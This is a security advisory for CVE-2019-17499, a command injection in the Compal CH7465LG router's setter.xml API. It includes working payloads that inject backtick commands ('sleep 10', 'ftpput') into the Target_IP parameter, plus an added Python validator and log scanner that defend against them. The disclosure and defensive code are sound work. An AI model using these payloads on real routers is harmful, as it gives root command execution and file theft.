VENDOR: COMPAL
MODEL: CH7465LG?
VERSION: CH7465LG-NCIP-6.12.18.25-2p4-NOSH
CVE: CVE-2019-17499
CVSS: 9.1
AUTHOR: zaeek (sec@gbti.pl)
FIXED IN: Version 6.12.18.25-2p6

[Discovery Genesis]
During a penetration test for one of our customers, we performed a quick audit of a router delivered by the Polish ISP (UPC), made by "Compal", device model "CH7465LG". The following write-up describes a vulnerability we found in the built-in web API. We are confident that all injected commands are executed with 'root' privileges. Although some busybox applets such as 'wget' and 'nc' are missing, we were still able to send and receive files with the 'ftpget'/'ftpput' applets. This research was done without physical access to the device motherboard; we would expect to find more vulnerabilities if this device were the main subject of a pentest.

[Affected Component]
Router Web API

[Attack Vectors]
An HTTP POST request carrying a valid session token must be sent to the `setter.xml` component. Since the input is not filtered for command injection, an additional command can be appended to a parameter value and executed.

[Exploitation]
The attacker must be authenticated to the web panel/API to obtain a valid session token. With this token, the following request achieves OS command injection (a 10-second sleep in this example):

token=&fun=126&Type=0&Target_IP=1.1.1.1`sleep 10`&Ping_Size=64&Num_Ping=1&Ping_Interval=1

The attacker can receive or send any file between the target system and the attacker's machine using 'ftpget'/'ftpput' respectively, as follows (writing a file to the target system in this example):

token=&fun=126&Type=0&Target_IP=1.1.1.1`ftpput localfile remotefile`&Ping_Size=64&Num_Ping=1&Ping_Interval=1

If one could bypass the CSRF protection or steal a saved cookie, it would be possible to create an automated exploit, e.g. a malicious script on a visited website triggering OS commands on this device.
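The missing input filtering described above is the root cause: the `Target_IP` value of the ping function (`fun=126`) reaches a shell unchecked. The following is an added example (not code from the advisory or from Compal) of the strict allow-list check such a handler should apply, plus a scanner that flags the same pattern in request records; the log format and sample lines are constructed for illustration.

```python
"""Added example (not part of the GBTI advisory): allow-list validation
for the Target_IP parameter of the CH7465LG setter.xml ping handler
(fun=126), and a scanner that flags rejected requests in constructed
request records. Handler, log format and sample lines are assumptions."""
import ipaddress
from urllib.parse import parse_qs


def validate_target_ip(value: str):
    """Return (ok, reason). Only a literal IPv4/IPv6 address passes;
    backticks, $( ), ';', whitespace, hostnames and empty values are all
    rejected before the value could be embedded in a 'ping' command line."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False, "Target_IP is not a literal IP address"
    return True, ""


def check_setter_body(body: str):
    """Validate a form-encoded POST body aimed at setter.xml.
    Functions other than the ping function (fun=126) pass through."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("fun", [""])[0] != "126":
        return True, "not a ping request"
    return validate_target_ip(params.get("Target_IP", [""])[0])


# Constructed records in the form "METHOD PATH BODY" (not real device logs).
SAMPLE_RECORDS = [
    "POST /setter.xml token=abc&fun=126&Type=0&Target_IP=192.0.2.1&Ping_Size=64&Num_Ping=1&Ping_Interval=1",
    "POST /setter.xml token=abc&fun=126&Type=0&Target_IP=1.1.1.1`sleep 10`&Ping_Size=64&Num_Ping=1&Ping_Interval=1",
    "POST /setter.xml token=abc&fun=3&Name=example",
]


def scan_records(lines):
    """Return the records whose setter.xml ping request fails validation."""
    hits = []
    for line in lines:
        parts = line.split(" ", 2)  # body may itself contain spaces
        if len(parts) < 3 or parts[1] != "/setter.xml":
            continue
        ok, _ = check_setter_body(parts[2])
        if not ok:
            hits.append(line)
    return hits
```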
[Timeline]
19/06/2019 - Contacted the Polish ISP (UPC) and shared vulnerability details
02/07/2019 - ISP contacted the vendor and confirmed the vulnerability; patching in progress
17/09/2019 - Patch created; update being deployed to customers
07/10/2019 - Public disclosure

[Mitigation]
The vulnerable code is fixed in version 6.12.18.25-2p6. To mitigate this vulnerability, update the device following the official guidelines.

[About Us]
GBTI SA is a security consulting and penetration testing company which specializes in cybersecurity and vulnerability research.